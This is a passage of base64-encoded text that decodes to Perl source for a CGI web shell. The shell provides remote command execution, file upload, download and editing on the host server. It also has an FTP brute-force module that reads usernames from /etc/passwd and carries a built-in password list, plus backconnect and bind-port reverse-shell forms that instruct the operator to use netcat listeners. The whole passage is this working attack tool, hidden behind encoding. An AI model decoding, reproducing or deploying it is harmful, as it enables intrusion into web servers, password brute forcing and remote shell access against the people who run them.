sZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOwoKCX0KCW15ICRyZXN1bHQ9IiI7CgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJJHJlc3VsdCAuPSAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOwoJfQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQKCXsKCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkKCQl7CgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOwoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsKCQkJY2xvc2UoVVBMT0FERklMRSk7CgkJCSRyZXN1bHQgLj0gIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsKCQl9Cgl9CgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluawojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBEb3dubG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsKCX0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlCgl7CgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkKIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEV4ZWN1dGVDb21tYW5kCnsKCW15ICRyZXN1bHQ9IiI7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsKCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7CgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQoJCSRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIjsKCQkkcmVzdWx0IC49ICZSdW5DbWQ7Cgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQoJewoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJJHJlc3VsdCAuPSZSdW5DbWQ7Cgl9CgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBydW4gY29tbWFuZAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpzdWIgUnVuQ21kCnsKCW15ICRyZXN1bHQ9IiI7CgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7CglpZighJFdpbk5UKQoJewoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7CgkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJfQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZAoJewoJCSR8PTE7CgkJJENvbW1hbmQgLj0gIiB8IjsKCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJewoJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOwoJCX0KCQkkfD0wOwoJfQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzCgl7CgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygnJENvbW1hbmQnKTsKCX0KCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiMgRm9ybSBTYXZlIEZpbGUgCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0Kc3ViIFNhdmVGaWxlRm9ybQp7CglteSAkcmVzdWx0ID0iIjsKCXN1YnN0cigkUnVuQ29tbWFuZCwwLDUpPSIiOwoJbXkgJGZpbGU9JnRyaW0oJFJ1bkNvbW1hbmQpOwoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7CgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kUnVuQ29tbWFuZDsKCW15ICRkaXI9IjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiZ3VpIikuIjwvc3Bhbj4iOwoJaWYoLXcgJEZpbGUpCgl7CgkJJHJvd3M9IjIzIgoJfWVsc2UKCXsKCQkkbXNnPSI8YnI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTsgY29sb3I6IHllbGxvdzsnID4gUGVybWlzc2lvbiBkZW5pZWQhPGZvbnQ+PGJyPiI7CgkJJHJvd3M9IjIwIgoJfQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOwoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsKCSRSdW5Db21tYW5kID0gIiRyZWFkIFwiJFJ1bkNvbW1hbmRcIiI7CgkkcmVzdWx0IC49ICA8PEVORDsKCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgoKCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CgkkUHJvbXB0Cgk8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNDAiIG5hbWU9ImMiPgoJPGlucHV0IG5hbWU9InMiIGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSIkZmlsZSIgPiAkc2F2ZSA8YnI+ICRtc2cKCTxicj48dGV4dGFyZWEgaWQ9ImRhdGEiIG5hbWU9ImRhdGEiIGNvbHM9IiRjb2xzIiByb3dzPSIkcm93cyIgc3BlbGxjaGVjaz0iZmFsc2UiPgpFTkQKCQoJJHJlc3VsdCAuPSAmUnVuQ21kOwoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsKCSRyZXN1bHQgLj0gICI8L2Zvcm0+IjsKCXJldHVybiAkcmVzdWx0Owp9CiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KIyBTYXZlIEZpbGUKIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpzdWIgU2F2ZUZpbGUoJCkKewoJbXkgJERhdGE9IHNoaWZ0IDsKCW15ICRGaWxlPSBzaGlmdDsKCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRGaWxlOwoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpCgl7CgkJYmlubW9kZSBGSUxFOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlyZXR1cm4gMTsKCX1lbHNlCgl7CgkJcmV0dXJuIDA7Cgl9Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEJydXRlIEZvcmNlciBGb3JtCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyRm9ybQp7CglteSAkcmVzdWx0PSIiOwoJJHJlc3VsdCAuPSA8PEVORDsKCjx0YWJsZT4KCjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM8YnI+ClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4KPC90ZD4KPC90cj4KPHRyPgo8dGQ+VXNlcjo8YnI+PHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0idXNlciI+CkVORApjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOwokcmVzdWx0IC49IDw8J0VORCc7CjwvdGV4dGFyZWE+PC90ZD4KPHRkPgoKUGFzczo8YnI+Cjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MKMTIzIUAjCjEyM2FkbWluCjEyM2FiYwoxMjM0NTZhZG1pbgoxMjM0NTU0MzIxCjEyMzQ0MzIxCnBhc3MxMjMKYWRtaW4KYWRtaW5jcAphZG1pbmlzdHJhdG9yCm1hdGtoYXUKcGFzc2FkbWluCnBAc3N3b3JkCnBAc3N3MHJkCnBhc3N3b3JkCjEyMzQ1NgoxMjM0NTY3CjEyMzQ1Njc4CjEyMzQ1Njc4OQoxMjM0NTY3ODkwCjExMTExMQowMDAwMDAKMjIyMjIyCjMzMzMzMwo0NDQ0NDQKNTU1NTU1CjY2NjY2Ngo3Nzc3NzcKODg4ODg4Cjk5OTk5OQoxMjMxMjMKMjM0MjM0CjM0NTM0NQo0NTY0NTYKNTY3NTY3CjY3ODY3OAo3ODk3ODkKMTIzMzIxCjQ1NjY1NAo2NTQzMjEKNzY1NDMyMQo4NzY1NDMyMQo5ODc2NTQzMjEKMDk4NzY1NDMyMQphZG1pbjEyMwphZG1pbjEyMzQ1NgphYmNkZWYKYWJjYWJjCiFAIyFAIwohQCMkJV4KIUAjJCVeJiooCiFAIyQkI0AhCmFiYzEyMwphbmh5ZXVlbQppbG92ZXlvdTwvdGV4dGFyZWE+CjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4KCjxvcHRpb24+MDwvb3B0aW9uPgo8b3B0aW9uPjE8L29wdGlvbj4KPG9wdGlvbj4yPC9vcHRpb24+Cgo8b3B0aW9uPjM8L29wdGlvbj4KPC9zZWxlY3Q+IAo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPgo8L2Zvcm0+CjwvdGFibGU+CkVORApyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQnJ1dGUgRm9yY2VyCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyCnsKCW15ICRyZXN1bHQ9IiI7CgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307CglpZigkaW57J3VzZXInfSBlcSAiIikKCXsKCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07Cgl9ZWxzZQoJewoJCXVzZSBOZXQ6OkZUUDsgCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsKCQlAcGFzcz0gc3BsaXQoL1xuLywgJGlueydwYXNzJ30pOwoJCWNob21wKEB1c2VyKTsKCQljaG9tcChAcGFzcyk7CgkJJHJlc3VsdCAuPSAiPGJyPjxicj5bK10gVHJ5aW5nIGJydXRlICRTZXJ2ZXJOYW1lPGJyPj09PT09PT09PT09PT09PT09PT09Pj4+Pj4+Pj4+Pj4+PDw8PDw8PDw8PD09PT09PT09PT09PT09PT09PT09PGJyPjxicj5cbiI7CgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQoJCXsKCQkJaWYoISgkdXNlcm5hbWUgZXEgIiIpKQoJCQl7CgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpCgkJCQl7CgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgCgkJCQkJaWYoJGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQoJCQkJCXsKCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7CgkJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJCWlmKCEoJGlueydzbGVlcCd9IGVxICIwIikpCgkJCQkJewoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7CgkJCQkJfQoJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCX0KCQkJfQoJCX0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQmFja2Nvbm5lY3QgRm9ybQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZEZvcm0KewoJcmV0dXJuIDw8RU5EOwoJPGJyPjxicj4KCgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPgoJPHRkPiBIb3N0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIG5hbWU9ImNsaWVudGFkZHIiIHZhbHVlPSIkRU5WeydSRU1PVEVfQUREUid9Ij4KCSBQb3J0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNyIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjgwIiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYmEnKS5pbm5lckhUTUw9dGhpcy52YWx1ZTsiPjwvdGQ+CgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkNvbm5lY3QiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDbGllbnQgbGlzdGVuIGJlZm9yZSBjb25uZWN0IGJhY2shCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+Cgk8YnI+WytdIENsaWVudCBsaXN0ZW4gd2l0aCBjb21tYW5kOiA8cnVuPm5jIC12diAtbCAtcCA8c3BhbiBpZD0iYmEiPjgwPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPgoKCTwvdHI+Cgk8L3RhYmxlPgoKCTxicj48YnI+Cgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CaW5kIFBvcnQ6IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJiYWNrYmluZCI+PC90ZD4KCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+CgoJIFBhc3N3b3JkOiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMTUiIG5hbWU9ImJpbmRwYXNzIiB2YWx1ZT0iVEhJRVVHSUFCVU9OIj48L3RkPgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDaHVjIG5hbmcgY2h1YSBkYyB0ZXN0IQoJPGJyPlsrXSBUcnkgY29tbWFuZDogPHJ1bj5uYyAkRU5WeydTRVJWRVJfQUREUid9IDxzcGFuIGlkPSJiaSI+MTQxMjwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4KCgk8L3RyPgoJPC90YWJsZT48YnI+CkVORAp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBCYWNrY29ubmVjdCB1c2UgcGVybAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t